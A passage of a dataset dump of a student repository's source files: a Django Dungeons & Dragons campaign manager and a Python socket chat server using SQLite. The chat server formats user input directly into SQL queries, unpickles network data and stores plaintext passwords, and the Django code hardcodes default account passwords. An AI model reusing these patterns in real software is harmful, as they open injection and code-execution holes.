models\nfrom Character_Builder.models import Character\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.utils.text import slugify\nfrom django.urls import reverse\nfrom PIL import Image\n\n\n# Constants\nMAX_LENGTH_CAMPAIGN_NAME = 255\n\n# finds a default user\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject')\n\n return default\n\n# Keeps track of individual campaigns\nclass Campaign(models.Model):\n creator = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser)\n campaignID = models.AutoField(primary_key=True)\n campaignName = models.CharField(max_length = MAX_LENGTH_CAMPAIGN_NAME)\n image = models.ImageField(default='default_campaign.jpg', upload_to='campaign_pics')\n #add Description field\n\n def __str__(self):\n return self.campaignName\n\n def save(self, **kwargs):\n super().save()\n\n image = Image.open(self.image.path)\n\n if image.width > 900 or image.height > 600:\n output_size = (900, 600)\n image.thumbnail(output_size)\n image.save(self.image.path)\n\n dm, created = CampaignDM.objects.get_or_create(campaign=self, user=self.creator)\n\n def get_absolute_url(self):\n return reverse('overview_with_pk', kwargs={'pk': self.pk})\n\n\n# Keeps track of DMs\nclass CampaignDM(models.Model):\n campaignDMID = models.AutoField(primary_key=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser)\n campaign = models.OneToOneField(Campaign, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.user.username\n\n\n# used to allow parties to store mulitple party members\nclass PartyCharacter(models.Model):\n 
#party = models.ForeignKey(Party, on_delete=models.CASCADE)\n character = models.ForeignKey(Character, on_delete=models.CASCADE)\n approved = models.BooleanField(default = False, editable = True)\n\n\n\n def __str__(self):\n return self.character.characterName\n\n# Keeps track of parties\nclass Party(models.Model):\n\n #Keeping this in for now in case the new method doesn't work\n partyID = models.AutoField(primary_key=True)\n #campaign = models.OneToOneField(Campaign, on_delete=models.CASCADE)\n campaign = models.ForeignKey(Campaign, related_name='campaign', on_delete=models.CASCADE)\n members = models.ManyToManyField(Character)\n\n @classmethod\n def add_member(cls, campaign, new_member):\n party, created = cls.objects.get_or_create(\n campaign = campaign\n )\n party.members.add(new_member)\n\n @classmethod\n def remove_member(cls, campaign, new_member):\n party, created = cls.objects.get_or_create(\n campaign = campaign\n )\n party.members.remove(new_member)\n\n def __str__(self):\n return self.campaign.campaignName\n\nclass CampaignComment(models.Model):\n title = models.CharField(max_length = 100)\n content = models.TextField()\n author = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser)\n date = models.DateTimeField(default=timezone.now)\n campaign = models.ForeignKey(Campaign, on_delete=models.CASCADE)\n image = models.ImageField(null=True, upload_to='comment_pics')\n slug = models.SlugField(default=slugify(\"Default Slug\"))\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.title + '' + str(self.date))\n super(CampaignComment, self).save(*args, **kwargs)\n\n if self.image != None:\n image = Image.open(self.image.path)\n\n if image.width > 500 or image.height > 500:\n output_size = (500, 500)\n image.thumbnail(output_size)\n image.save(self.image.path)\n\n def __str__(self):\n return self.slug\n" }, { "alpha_fraction": 0.6519173979759216, "alphanum_fraction": 0.6519173979759216, "avg_line_length": 17.86111068725586, "blob_id": "4d632d31338f0ebd6356c9663332aa20f97f5b2c", "content_id": "5ee55df6acd1d4f43f53f0b5e13d369d8beaa29a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 678, "license_type": "no_license", "max_line_length": 69, "num_lines": 36, "path": "/Character_Builder/forms.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Character, AbilityScoreSet, AbilityScore\n\nclass CreateCharacterForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Character\n\t\tfields = [\n\t\t\t'public',\n\t\t\t'characterName', \n\t\t\t'level', \n\t\t\t'xp', \n\t\t\t'maxHP', \n\t\t\t'currentHP', \n\t\t\t'alignment', \n\t\t\t'size',\n\t\t\t'strength',\n\t\t\t'dexterity',\n\t\t\t'constitution',\n\t\t\t'intelligence',\n\t\t\t'wisdom',\n\t\t\t'charisma'\n\t\t]\n\n# Now unused to prevent needing to access another from within a form.\nclass EditAbilityScoresForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = AbilityScoreSet\n\t\tfields = [\n\t\t\t# 'character',\n\t\t\t'strength',\n\t\t\t'dexterity',\n\t\t\t'constitution',\n\t\t\t'intelligence',\n\t\t\t'wisdom',\n\t\t\t'charisma'\n\t\t]" }, { "alpha_fraction": 0.7117202281951904, "alphanum_fraction": 0.7131379842758179, "avg_line_length": 32.60317611694336, "blob_id": "eab3207dc46bc735cb49dab909499aece831638d", "content_id": "160b1e36bfb07a694dd26117becac217038b29ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2116, 
"license_type": "no_license", "max_line_length": 117, "num_lines": 63, "path": "/Inventory/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Character_Builder.models import Character\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\n# Constants\nMAX_LENGTH_ITEM_NAME = 255\n\n# Creates a default character\ndef defaultCharacter():\n default = Character.objects.first()\n\n if default is None:\n default = Character.objects.create(characterName='Default Character', alignment='Lawful Good', size='Medium')\n\n return default\n\n# finds a default user\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject')\n\n return default\n\n# Keeps track of inventories\nclass Inventory(models.Model):\n inventoryID = models.AutoField(primary_key=True)\n character = models.ForeignKey(Character, on_delete=models.CASCADE, default=defaultCharacter)\n\n def __str__(self):\n return self.character.characterName\n\n# Creates default inventory\ndef defaultInventory():\n default = Inventory.objects.first()\n\n if default is None:\n dc = Character.objects.create(characterName='Default Character', alignment='Lawful Good', size='Medium')\n default = Inventory.objects.create(character=dc)\n return default\n\n# Keeps track of individual items\nclass Item(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser, null=True, blank=True)\n itemID = models.AutoField(primary_key=True)\n itemName = models.CharField(max_length = MAX_LENGTH_ITEM_NAME)\n inventory = models.ForeignKey(Inventory, on_delete=models.CASCADE, default=defaultInventory)\n public = models.BooleanField(default=True)\n\n # Should associate a user with the character when initialized\n def save_model(self, request, obj, form, change):\n if obj.user == defaultUser:\n # Only set user during the first save.\n obj.user = request.user\n \n # this is where the page goes to after you save\n def get_absolute_url(self):\n return reverse('item-detail', kwargs={'pk': self.pk})\n\n def __str__(self):\n return self.itemName" }, { "alpha_fraction": 0.7511312365531921, "alphanum_fraction": 0.7541478276252747, "avg_line_length": 28.488889694213867, "blob_id": "5bf03181ec46d96c158eec757bded94128df6166", "content_id": "47bb5e260fd7eda85ee88115ccb94bcb784624e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "no_license", "max_line_length": 91, "num_lines": 45, "path": "/Character_Builder/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom .models import *\n\n# Test Constants\nDEFAULT_LEVEL = 0\nDEFAULT_XP = 0\nDEFAULT_HP = 6\n\nclass CharacterCreateTestCase(TestCase):\n\tdef setUp(self):\n\t\tCharacter.objects.create(characterName=\"Malikar\", alignment=\"Lawful Evil\", size=\"Medium\")\n\n\tdef test_character_id(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.characterID, 1)\n\n\tdef test_character_name(self):\n\t\ttry:\n\t\t\tCharacter.objects.get(characterName=\"Malikar\")\n\t\texcept:\n\t\t\tself.fail()\n\n\tdef test_character_level(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.level, DEFAULT_LEVEL)\n\n\tdef test_character_xp(self):\n\t\tchar = 
Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.xp, DEFAULT_XP)\n\n\tdef test_character_max_hp(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.maxHP, DEFAULT_HP)\n\n\tdef test_character_current_hp(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.currentHP, DEFAULT_HP)\n\n\tdef test_character_alignment(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.alignment, \"Lawful Evil\")\n\n\tdef test_character_size(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tself.assertEqual(char.size, \"Medium\")" }, { "alpha_fraction": 0.7310924530029297, "alphanum_fraction": 0.7310924530029297, "avg_line_length": 30, "blob_id": "e630bb030a53f1d8bdf73d79fa5eb40361c157dc", "content_id": "18789174693889e4ab7aa68bb2589d989da7753a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 82, "num_lines": 23, "path": "/Users/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\nclass ProfileCreationTestCase(TestCase):\n\n\tdef test_profile_created_upon_user_creation(self):\n\n\t\tUser.objects.create_user('TestCaseUser', email='[email protected]', password='testpassword')\n\t\tuser = User.objects.get(username='TestCaseUser')\n\t\ttry:\n\t\t\tProfile.objects.get(user = user)\n\t\texcept Profile.DoesNotExist as e:\n\t\t\tself.fail('Profile was not created when User was created:', e)\n\n\tdef test_each_user_has_a_profile(self):\n\n\t\tuser_list = User.objects.all()\n\t\tfor user in user_list:\n\t\t\ttry:\n\t\t\t\tProfile.objects.get(user = user)\n\t\t\texcept Profile.DoesNotExist as e:\n\t\t\t\tself.fail('User does not have a Profile:', e)\n\n" }, { "alpha_fraction": 0.6532156467437744, "alphanum_fraction": 0.6532156467437744, "avg_line_length": 25.14285659790039, "blob_id": "3142bc75aead75a16a55f4482398aeac55e7e870", "content_id": "ed63d120b227879889f627f480d79833d3ee85b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2379, "license_type": "no_license", "max_line_length": 78, "num_lines": 91, "path": "/Inventory/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.views.generic import (\n ListView, \n DetailView,\n CreateView,\n UpdateView,\n DeleteView\n)\n\nfrom django.http import HttpResponseRedirect\nfrom .models import *\nfrom .forms import CreateItemForm\n\n# Home view\ndef home(request):\n form = CreateItemForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n\n context = {\n 'title' : 'Inventory',\n 'items' : Item.objects.all(),\n 'form' : form\n }\n\n return render(request, 'Inventory/item-home.html', context)\n\n# This is a class based view that uses django's built-in\n# ListView view to display the inventorys\n# It inherits from ListView\nclass ItemListView(ListView): \n model = Item\n # template_name = 'InventoryBuilder/Inventory_builder-home.html'\n context_object_name = 'items'\n\n\nclass ItemDetailView(DetailView):\n model = Item\n # context_object_name = 'inventorys'\n #context_object_name = 
'items'\n\n\nclass ItemCreateView(LoginRequiredMixin, CreateView):\n model = Item\n fields = ['itemName']\n # exclude = []\n\n login_url = '/login/'\n\n # def __init__(self, *args, **kwargs):\n # form.instance.user = self.request.user\n\n def form_valid(self, form):\n # Updates the author of the current form to be the current user\n form.instance.user = self.request.user \n return super().form_valid(form)\n\n\nclass ItemEditView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Item\n fields = ['itemName']\n # exclude = []\n\n login_url = '/login/'\n \n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n \n # Tests to ensure the logged-in user is the owner of that inventory...\n def test_func(self):\n Item = self.get_object()\n if self.request.user == Item.user:\n return True\n return False\n\n\nclass ItemDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Item\n success_url = '/inventory/inventory'\n login_url = '/login/'\n fail_url = '/login/' #Works?\n\n def test_func(self):\n Item = self.get_object()\n if self.request.user == Item.user:\n return True\n return False\n" }, { "alpha_fraction": 0.6688417792320251, "alphanum_fraction": 0.6802610158920288, "avg_line_length": 24.58333396911621, "blob_id": "2e6a925a0c63d1b5b988e43ba408fb6b859847d2", "content_id": "5df2aa5098b2155f7316092994534c9caee9866d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/Character_Builder/management/commands/populate_user_db.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\n\n# Populates the user base with 2 simple default users\nclass Command(BaseCommand):\n # args = '<foo bar ...>'\n help = 'Populate the user base with two simple default users'\n\n def _create_users(self):\n defaultuser1 = User.objects.create_user(\n 'defaultuser1',\n password='djangoproject'\n )\n defaultuser1.save()\n\n defaultuser2 = User.objects.create_user(\n 'defaultuser2',\n password='djangoproject'\n )\n defaultuser2.save()\n\n\n def handle(self, *args, **options):\n self._create_users()" }, { "alpha_fraction": 0.6553308963775635, "alphanum_fraction": 0.6553308963775635, "avg_line_length": 27.605262756347656, "blob_id": "ff1123bdd854d83ae1bad01552dd907d29a27872", "content_id": "4bafadf7c40970e45a01a0971e1a3c5a1017d1a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 70, "num_lines": 38, "path": "/Character_Builder/urls.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (\n CharacterListView,\n CharacterDetailView,\n CharacterCreateView,\n CharacterEditView,\n CharacterDeleteView,\n\n CharacterRaceListView,\n CharacterClassListView,\n)\nfrom . 
import views\n\nurlpatterns = [\n path('', \n views.home, name='character_builder-home'),\n # path('', PostListView.as_view(), name='character_builder-home'),\n path('characters/', \n CharacterListView.as_view(), name='character-list'),\n\n path('characters/create/', \n CharacterCreateView.as_view(), name='character-create'),\n\n path('characters/<int:pk>/', \n CharacterDetailView.as_view(), name='character-detail'),\n\n path('characters/<int:pk>/edit', \n CharacterEditView.as_view(), name='character-edit'),\n\n path('characters/<int:pk>/delete', \n CharacterDeleteView.as_view(), name='character-delete'),\n \n path('races/', \n CharacterRaceListView.as_view(), name='characterRace-list'),\n\n path('classes/', \n CharacterClassListView.as_view(), name='characterClass-list'),\n]\n\n" }, { "alpha_fraction": 0.7870370149612427, "alphanum_fraction": 0.7870370149612427, "avg_line_length": 20.600000381469727, "blob_id": "1c1b14e39a7b92d9556c0268211eca6ae732990f", "content_id": "e180da472afa34ac756c665c988dacc5dcc83e11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 108, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/Character_Builder/apps.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass CharacterBuilderConfig(AppConfig):\n name = 'Character_Builder'\n" }, { "alpha_fraction": 0.7859452962875366, "alphanum_fraction": 0.8018230199813843, "avg_line_length": 38.546512603759766, "blob_id": "9dae894e947c528dc8c8f462f19edd6aed7057b2", "content_id": "a64180bc13058d427ba9e8d1cfde081b0ca2d984", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3401, "license_type": "no_license", "max_line_length": 211, "num_lines": 86, "path": "/Architecture.md", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Program Organization\n\n[Diagram](https://docs.google.com/drawings/d/1TUbR1T9_B6WfCYGCicQKSH8qjjn9X43obXvX7nI2Zt0/edit?usp=sharing)\n\n[In-Depth Description](https://docs.google.com/document/d/1FA4I41uiwIgKB1tqMOyXJnYcXf9lOJA9ilg85u-RlCQ/edit?usp=sharing)\n\n# Major Classes\n\n[Diagram](https://drive.google.com/file/d/1NqDpVnVrYHD-SCcfD8B3sug9F6vCOEDB/view?usp=sharing)\n\n[Class Descriptions](https://docs.google.com/document/d/1n7qOdXY2i-A0tg3gyodm_GhEKr2NwJpASYI_jcA4ivU/edit?usp=sharing)\n\n# Data Design\n\n[Database Schemas](https://docs.google.com/document/d/1E3cikrkHcXE-PxppXv7h1ovNXgMTyPIy-kNyr7d9zvQ/edit?usp=sharing)\n\n# Business Rules\n\nThe software needs to follow the rules of DnD to allow users to create characters and perform actions that are relevant to the DnD universe.\n\n# User Interface Design\n\n[Diagram](https://drive.google.com/file/d/1WVBX7nz-pJ9zIM4E0k-gchcGm-XRzGoa/view?usp=sharing)\n\n[User Stories](https://docs.google.com/document/d/1NZeqT6CyVsro24gmO0C-WLZbVaCbVZdCNq2G_n58w24/edit?usp=sharing)\n\n# Resource Management\n\nResource Management is not a concern of this project as we are working with simple operations on a database instead of complex algorithms with expensive computation costs.\n\n# Security\n\nSecurity for this project will be handled by django and the use of user profiles requiring a username and password. 
Accessing an account and the characters/campaigns contained within will require authentication.\n\n# Performance\n\nPerformance is not a concern of this project.\n\n# Scalability\n\nBecause we are creating a web page style project, if we need to add things in the future to expand on the system we can easily add new pages and features that can acheive this.\n\n# Interoperability\n\nInteroperability will be handled by django as it standardizes the ways in which things are done, making information exchange easy.\n\n# Internationalization/Localization\n\nInternationalization and Localization are not a concern for this project. It will designed like it is being pushed to American markets.\n\n# Input/Output\n\n# Error Processing\n\nError processing for this project will be done by sending error messages and will be handled by Django.\n\n# Fault Tolerance\n\nTolerance for faults will be minimal. If a field is incorrect or void, we will simply reject the field and require the user fill it in properly before allowing them to continue.\n\n# Architectural Feasibility\n\nThe architecture is feasible for what we are trying to accomplish as we simply need an interface for a database to hold the user's data.\n\n# Overengineering\n\nAs mentioned in error processing and fault tolerance, we will not be allowing errors to be passed through the system. Therefore, the system will lean heavily towards doing the simplest thing possible.\n\n# Build-vs-Buy Decisions\n\nThird Party Systems\n\n * Crispy Forms - Renders forms for easier readability of forms\n \n * Bootstrap 4 - This allows us to easily create attractive HTML for the site without having to manually write all HTML\n \n * Pillow - Image handling library\n \n\n# Reuse\n\nWe are using Bootstrap and Django to create a lot of what we are working on, but we are creating the code and other components from the ground up. 
Thus, this is not a concern for the project.\n\n# Change Strategy\n\nTo handle changes to the system, we will meet with the team, expand the application, and implement the new features using a test-driven delevopment approach.\n" }, { "alpha_fraction": 0.6518151760101318, "alphanum_fraction": 0.6831682920455933, "avg_line_length": 29.299999237060547, "blob_id": "2d6fd3508b7b8189e84fa4ac6856389c78868e3c", "content_id": "57417216ad9c941bf66592762c1aecb9bb745528", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 190, "num_lines": 20, "path": "/Character_Builder/migrations/0003_character_characterclass.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:09\n\nimport Character_Builder.models\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Character_Builder', '0002_character_race'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='character',\n name='characterClass',\n field=models.ForeignKey(blank=True, default=Character_Builder.models.defaultClass, null=True, on_delete=django.db.models.deletion.PROTECT, to='Character_Builder.CharacterClass'),\n ),\n ]\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 9.428571701049805, "blob_id": "86fa70b19d185c9b901059c0893990758edc1d47", "content_id": "02413fe4feb41edd294fe2f7d2cb721edf4c2647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/Character_Builder/createRaces.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "import os\n\n\n\nos.system(\"python manage.py shell\")\n\n# Unneded attempt. lol" } ]
32
GRAYH3ART/PythonTestGitProject
https://github.com/GRAYH3ART/PythonTestGitProject
4bcaac27fa0fde3530691b17800549435a7d4649
db627895c9cbf7fc29ea2c3c1c82e45f41367ea9
d95d35ea8e8793fa6404210320cdf3edf2474784
refs/heads/master
2022-07-02T17:04:57.668788
2020-05-15T11:08:42
2020-05-15T11:08:42
264,171,861
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7765362858772278, "alphanum_fraction": 0.7765362858772278, "avg_line_length": 18.88888931274414, "blob_id": "67f7800d329b5ef8c93aafc34769a163eb7188c3", "content_id": "b3bcf4607236b6d65fce60f34ec62332dfa29c03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/start.py", "repo_name": "GRAYH3ART/PythonTestGitProject", "src_encoding": "UTF-8", "text": "import platform\n\nprint ('PythonTestGitProject')\n\nprint(platform.system())\nprint(platform.system())\nprint(platform.machine())\nprint(platform.version())\nprint(platform.processor())\n" } ]
1
shakkedstux/cyber_final_project
https://github.com/shakkedstux/cyber_final_project
032b37d815102090e0f92e9e205f5d3e84d2559d
02d9afa4bb52c408f0676391b6f549aa6932572a
814c305259ab410c84ec352ea0326adfc02536a3
refs/heads/master
2022-09-10T02:07:11.918091
2020-05-22T17:55:58
2020-05-22T17:55:58
266,175,511
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6113763451576233, "alphanum_fraction": 0.6218385100364685, "avg_line_length": 28.130178451538086, "blob_id": "df7a755ad094c08a781c71715373bd5a6933f98f", "content_id": "891982a048ec4214a4ab177416d4aa69edba4938", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9845, "license_type": "no_license", "max_line_length": 179, "num_lines": 338, "path": "/server.py", "repo_name": "shakkedstux/cyber_final_project", "src_encoding": "UTF-8", "text": "# CYBER PROJECT - SERVER ( VERSION 1.0 ) BY SHAKKED STUX\n\n\nimport socket\nimport select\nimport time\nimport pickle\nimport sqlite3\nfrom datetime import datetime\n\n\ndef get_user_out(username):\n\n global sockets\n\n socket = username_socket(username)\n\n log_out(username)\n\n massageType = \"8\"\n send(socket, [massageType])\n\n\ndef send_new_member(socket, username, group):\n\n massageType = \"7\"\n massage = [massageType, username, group]\n\n send(socket, massage)\n\n\ndef send_new_member_to_all(groupname, username):\n\n global conn, usernames\n\n members = conn.execute(\"SELECT username FROM groups WHERE type = 'g' and contact = '{}'\".format(groupname)).fetchall() # (usernames)\n\n for member in members:\n if member[0] in usernames: # members looks like - [('a',),('b',),('c',)..]\n send_new_member(username_socket(member[0]), username, groupname)\n\n\ndef go_to_massages(username, group):\n\n global conn\n\n x = conn.execute(\"SELECT type FROM groups WHERE contact = '{}' and username = '{}'\".format(group, username)).fetchall()\n if x[0][0] == \"c\": # group is private\n return private_massages(username, group)\n return massages(group)\n\n\ndef contact_user(username, contact):\n\n global conn\n\n x = conn.execute(\"SELECT COUNT(1) FROM groups WHERE type = 'g' and contact = '{}'\".format(contact)).fetchall()\n if x[0][0] == 0: # if connection wasn't made yet\n conn.execute(\"INSERT INTO groups (type, contact, username) VALUES ('c', '{}', '{}')\".format(contact, username))\n conn.commit()\n\n return private_massages(username, contact)\n\n massageType = \"5\"\n return ([massageType, \"Please choose different user.\"])\n\n\ndef create_group(username, groupname):\n\n global conn\n\n y = conn.execute(\"SELECT COUNT(1) FROM groups WHERE contact = '{}'\".format(groupname)).fetchall() # not even letting you take a name that someone contacted , but not exists\n x = conn.execute(\"SELECT COUNT(1) FROM users WHERE username = '{}'\".format(groupname)).fetchall()\n if y[0][0] + x[0][0] == 0: # if group not exist\n conn.execute(\"INSERT INTO groups (type, contact, username) VALUES ('g', '{}', '{}')\".format(groupname, username))\n conn.commit()\n\n return massages(groupname)\n\n massageType = \"5\"\n return ([massageType, \"Please choose different name.\"])\n\n\ndef quit_group_page(username, groupname):\n\n # inserting time to groups table where username = {} and groupname = {}\n # for now - works exactly like groups()\n\n return groups(username)\n\n\ndef log_out(username):\n\n global usernames\n index = usernames.index(username)\n usernames[index] = \"\"\n\n\ndef send_massage(socket, massageInfo):\n\n massageType = \"6\"\n massage = [massageType, massageInfo]\n\n send(socket, massage)\n\n\ndef send_massage_to_all(massageInfo):\n\n global conn, usernames\n\n groupname = massageInfo[2]\n members = conn.execute(\"SELECT username FROM groups WHERE contact = '{}'\".format(groupname)).fetchall() # (usernames)\n\n for member in members:\n if member[0] in usernames: # members looks like - 
[('a',),('b',),('c',)..]\n send_massage(username_socket(member[0]), massageInfo)\n\n\ndef private_massages(username1, username2):\n\n global conn\n\n massages = conn.execute('''SELECT * FROM massages WHERE sendto = '{}' AND sender = '{}' OR\n sendto = '{}' AND sender = \"{}\" ORDER BY time'''.format(username1, username2, username2, username1)).fetchall()\n\n massageType = \"4\"\n return [massageType, username2, massages]\n\n\ndef new_massage(username, sendto, private, msg):\n\n global conn\n now = datetime.now()\n formattedNow = now.strftime('%Y-%m-%d %H:%M:%S')\n massageInfo = [username, private, sendto, formattedNow, msg] # sendto - groupname (or username)\n\n conn.execute('''INSERT INTO massages (sender, private, sendto, time, text)\n VALUES ('{}', '{}', '{}', '{}', '{}')'''.format(*massageInfo))\n conn.commit()\n\n if private == \"p\":\n send_massage(username_socket(username), massageInfo)\n if sendto in usernames:\n send_massage(username_socket(sendto), massageInfo)\n\n else:\n send_massage_to_all(massageInfo)\n\n\ndef massages(groupname): # returns massages and members in group , and also groupname\n\n global conn\n massages = conn.execute(\"SELECT * FROM massages WHERE sendto = '{}' ORDER BY time\".format(groupname)).fetchall()\n members = conn.execute(\"SELECT username FROM groups WHERE contact = '{}'\".format(groupname)).fetchall()\n for i in range(len(members)):\n members[i] = members[i][0]\n\n massageType = \"2\"\n\n return [massageType, groupname, massages, members]\n\n\ndef join_group(username, groupname):\n\n global conn\n\n y = conn.execute(\"SELECT COUNT(1) FROM groups WHERE type = 'g' and contact = '{}'\".format(groupname)).fetchall()\n if y[0][0] != 0: # if there is a group\n x = conn.execute(\"SELECT COUNT(1) FROM groups WHERE type = 'g' and contact = '{}' AND username = '{}'\".format(groupname, username)).fetchall()\n if x[0][0] == 0: # if he is not in it\n\n send_new_member_to_all(groupname, username)\n conn.execute(\"INSERT INTO groups (type, contact, username) VALUES ('g', '{}', '{}')\".format(groupname, username))\n conn.commit()\n\n return massages(groupname)\n\n massageType = \"5\"\n return ([massageType, \"No such group.\"])\n\n\ndef groups(username):\n\n global conn\n\n groupnames = conn.execute(\"SELECT contact FROM groups WHERE username = '{}'\".format(username)).fetchall()\n\n massageType = \"1\"\n return [massageType, groupnames]\n\n\ndef login(username, password, socket):\n\n global conn, usernames, sockets\n x = conn.execute(\"SELECT COUNT(1) FROM users WHERE username = '{}' AND password = '{}'\".format(username, password)).fetchall()\n\n if x[0][0] == 1:\n if username in usernames: # the user is already connected (ideally from another device)\n get_user_out(username)\n\n usernames[sockets.index(socket)] = username\n\n return groups(username)\n\n return [\"0\"]\n\n\ndef create_user(username, password, socket):\n\n global conn, usernames, sockets\n x = conn.execute(\"SELECT COUNT(1) FROM users WHERE username = '{}'\".format(username)).fetchall()\n y = conn.execute(\"SELECT COUNT(1) FROM groups WHERE contact = '{}' and type = 'g'\".format(username)).fetchall() # letting you take the name also if someone contacted this name\n\n if x[0][0] + y[0][0] >= 1:\n return [\"3\"]\n\n conn.execute(\"INSERT INTO users (username, password) VALUES ('{}', '{}')\".format(username, password))\n conn.commit()\n\n usernames[sockets.index(socket)] = username\n\n massageType = \"1\"\n return [massageType, []] # [] - groups\n\n\ndef username_socket(x):\n\n if type(x) == str: # x 
is username\n return sockets[usernames.index(x)]\n\n return usernames[sockets.index(x)]\n\n\ndef send(socket, massage):\n\n massage = pickle.dumps(massage)\n if type(socket) == str: # clientSocket represent username, find the socket.\n socket = username_socket(socket)\n\n socket.send(massage)\n\n\ndef massage(words, socket):\n\n massageType = words[0]\n username = username_socket(socket)\n\n if massageType == \"0\": # client create user\n send(socket, create_user(words[1], words[2], socket))\n\n if massageType == \"1\": # client log in\n send(socket, login(words[1], words[2], socket))\n\n\n if massageType == \"2\": # client join group (2,7,8)\n send(socket, join_group(username, words[1]))\n\n\n if massageType == \"3\": # client need groups table\n send(socket, groups(username))\n\n if massageType == \"4\": # client send massage\n new_massage(username, words[1], words[2], words[3])\n\n if massageType == \"5\": # client logs out\n log_out(username)\n\n if massageType == \"6\": # client quits group(chat) page - For now SAME as \"3\"\n send(socket, quit_group_page(username, words[1]))\n\n if massageType == \"7\": # client contact user\n send(socket, contact_user(username, words[1]))\n\n if massageType == \"8\": # client creates group\n send(socket, create_group(username, words[1]))\n\n if massageType == \"9\": # client creates group\n send(socket, go_to_massages(username, words[1]))\n\n\ndef listen():\n\n serverSocket = socket.socket()\n port = 7784\n serverSocket.bind((\"0.0.0.0\",port))\n serverSocket.listen(10)\n\n global sockets, usernames\n sockets = []\n usernames = []\n size = 512\n while True:\n rlist, wlist, xlist = select.select([serverSocket] + sockets, sockets, [])\n\n for userSocket in rlist:\n\n if userSocket is serverSocket: # new user connected\n (new_socket, address) = serverSocket.accept()\n sockets.append(new_socket)\n usernames.append(\"\")\n\n else:\n try:\n msg = b''\n while True:\n x = userSocket.recv(size)\n msg = msg + x\n if len(x) < size:\n break\n words = pickle.loads(msg)\n massage(words, userSocket)\n except: # user exited\n index = sockets.index(userSocket)\n sockets.pop(index)\n usernames.pop(index)\n\n break_length = 0.2\n time.sleep(break_length)\n\n\ndef create_DB():\n\n global conn\n conn = sqlite3.connect('database.db')\n 